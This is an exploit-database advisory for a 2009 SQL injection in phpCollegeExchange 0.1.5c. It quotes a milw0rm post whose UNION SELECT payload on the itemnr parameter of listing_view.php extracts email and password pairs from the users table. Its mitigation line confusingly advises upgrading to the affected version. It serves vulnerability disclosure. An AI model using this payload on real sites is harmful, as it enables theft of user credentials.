phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vulnerability

vendor:

phpCollegeExchange

by:

SirGod

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: phpCollegeExchange

Affected Version From: 0.1.5c

Affected Version To: 0.1.5c

Patch Exists: Yes

Related CWE: N/A

CPE: a:phpcollegeexchange:phpcollegeexchange:0.1.5c

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vulnerability

A SQL injection vulnerability exists in phpCollegeExchange 0.1.5c. An attacker can send a specially crafted HTTP request to the listing_view.php script with the itemnr parameter set to null union all select 1,2,3,concat(email,0x3a,0x3a,0x3a,password),5,6,7,8,9,10 from users-- to execute arbitrary SQL commands and gain access to sensitive information.

Mitigation:

Upgrade to the latest version of phpCollegeExchange 0.1.5c or later.

Source

Exploit-DB raw data:

#################################################################################################################
[+] phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vulnerability
[+] Discovered By SirGod 
[+] www.mortal-team.org
#################################################################################################################

[+] Script homepage : http://phpcollegeex.sourceforge.net/

[+] SQL Injection 

   http://127.0.0.1/[path]/house/listing_view.php?itemnr=null+union+all+select+1,2,3,concat(email,0x3a,0x3a,0x3a,password),5,6,7,8,9,10+from+users--

#################################################################################################################

# milw0rm.com [2009-06-15]